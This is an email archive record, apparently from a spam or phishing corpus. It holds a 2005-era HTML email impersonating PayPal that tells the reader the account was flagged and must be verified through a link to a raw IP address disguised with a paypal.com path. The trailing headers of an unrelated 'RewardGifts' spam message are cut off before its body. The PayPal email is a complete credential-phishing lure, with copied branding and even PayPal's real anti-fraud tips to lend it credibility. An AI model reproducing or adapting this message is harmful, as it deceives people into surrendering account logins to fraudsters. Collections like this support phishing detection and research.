From: PayPal <service@paypal.com>
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Status: O
X-Status: 
X-Keywords:                  
X-UID: 325

</style>
</head>

<BODY><TABLE><TR><TD bgcolor="#ffffff">
<table width="600" cellspacing="0" cellpadding="0" border="0" align="center">
<tr valign="top">
	<td><a href="https://www.paypal.com/us" target="_blank" ><img src="http://images.paypal.com/en_US/i/logo/email_logo.gif" alt="PayPal" border="0"></a></td>
</tr>
</table>

<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tr>
	<td background="http://images.paypal.com/images/bg_clk.gif" width="100%"><img src="http://images.paypal.com/images/pixel.gif" height="29" width="1" border="0"></td>
</tr>
<tr>
	<td><img src="http://images.paypal.com/images/pixel.gif" height="10" width="1" border="0"></td>
</tr>
</table>

<table width="600" cellspacing="0" cellpadding="0" border="0" align="center">
<tr valign="top">
	<td width="400">
	<table width="100%" cellspacing="0" cellpadding="5" border="0">
		<tr>
			<td>Dear PayPal Member,<br><br>
Your account has been randomly flagged in our system as a part of our routine security measures. 
This is a must to ensure that only you have access and use of your PayPal account and to ensure a safe PayPal experience. We require all flagged accounts to verify their information on file with us. To verify your Information at this time, please visit our secure server webform by clicking the hyperlink below
<br><br>
 
<table width="75%" cellpadding="1" cellspacing="0" border="0" bgcolor="#FFE65C" align="left">
<tr>
<td>
	<table width="100%" cellpadding="4" cellspacing="0" border="0" bgcolor="#FFFECD" align="center">
		<tr>
			<td class="pp_sansserif" align="center"><a href="http://203.115.22.179/.us/paypal.com/webscr/" target="_blank" > Click here to verify your Information</a></td>
		</tr>
	</table>
</td>
</tr>
</table>

<br>
<br>
<br>
 Thank you for using PayPal!<br>
The PayPal Team</td>
</tr>

<tr>
<td>
<hr class="dotted">
</td>
</tr>

<tr>
<td>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tr>
<td class="pp_footer">Please do not reply to this e-mail. Mail sent
to this address cannot be answered. For assistance, log
in</a> to your PayPal account and choose the "Help" link in the
footer of any page.<br>
<br class="h10">
 To receive email notifications in plain text instead of HTML,
update your preferences <a href="https://www.paypal.com/us/PREFS-NOTI" target="_blank" > here</a>.</td>
</tr>

<tr>
	<td><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" height="10" width="1" border="0"></td>
</tr>
</table>
</td>
</tr>

<tr>
	<td><br><span class="pp_footer">PayPal Email ID PP478<br><br></span></td>
</tr>
</table>
</td>
<td><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" height="1" width="10" border="0"></td>
<td width="190" valign="top">
<table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#CCCCCC">
<tr>
	<td>
	<table width="100%" cellspacing="0" cellpadding="0" border="0" bgcolor="#ffffff">
	<tr>
	<td>
		<table width="100%" cellspacing="0" cellpadding="5" border="0" bgcolor="#EEEEEE">
		<tr>
		<td class="pp_sidebartextbold" align="center">Protect Your Account Info</td>
		</tr>
		</table>
		
<table width="100%" cellspacing="0" cellpadding="5" border="0">
<tr>
<td class="pp_sidebartext">Make sure you never provide your
password to fraudulent websites.<br>
<br>
To safely and securely access the PayPal website or your account,
open up a new web browser (e.g. Internet Explorer or Netscape) and
type in the PayPal URL (http://www.paypal.com/).<br>
<br>
PayPal will never ask you to enter your password in an email.<br>
<br>
 For more information on protecting yourself from fraud, please
review our Security Tips at http://www.paypal.com/securitytips<br>
<img src="http://images.paypal.com/en_US/images/pixel.gif" height=
"5" width="1" border="0"></td>
</tr>
</table>
</td>
</tr>




From b.RewardGifts.0-534a18a-35a3.domain.com.-username@mx1930.aa04.com  Sun May  8 00:32:47 2005
Return-Path: <b.RewardGifts.0-534a18a-35a3.domain.com.-username@mx1930.aa04.com>
X-Original-To: username@login.domain.com
Delivered-To: username@login.domain.com
Received: from mail1.domain.com (mail1.domain.com [10.23.1.4])
	by spanky.domain.com (Postfix) with ESMTP id 4E0BA536EC2
	for <username@login.domain.com>; Sun,  8 May 2005 00:32:47 -0400 (EDT)
Received: from mx1930.aa04.com (mx1930.aa04.com [69.6.19.30])
	by mail1.domain.com (Postfix) with ESMTP id 1BC4085A738
	for <username@domain.com>; Sun,  8 May 2005 00:32:47 -0400 (EDT)
Received: (from daemon@localhost)
	by mx1930.aa04.com (8.8.8/8.8.8) id OAA35543;
	Sat, 7 May 2005 14:31:59 -0700 (PDT)
Date: Sat, 7 May 2005 15:22:42 -0700 (PDT)
Message-Id: <200505072131.OAA35543@mx1930.aa04.com>
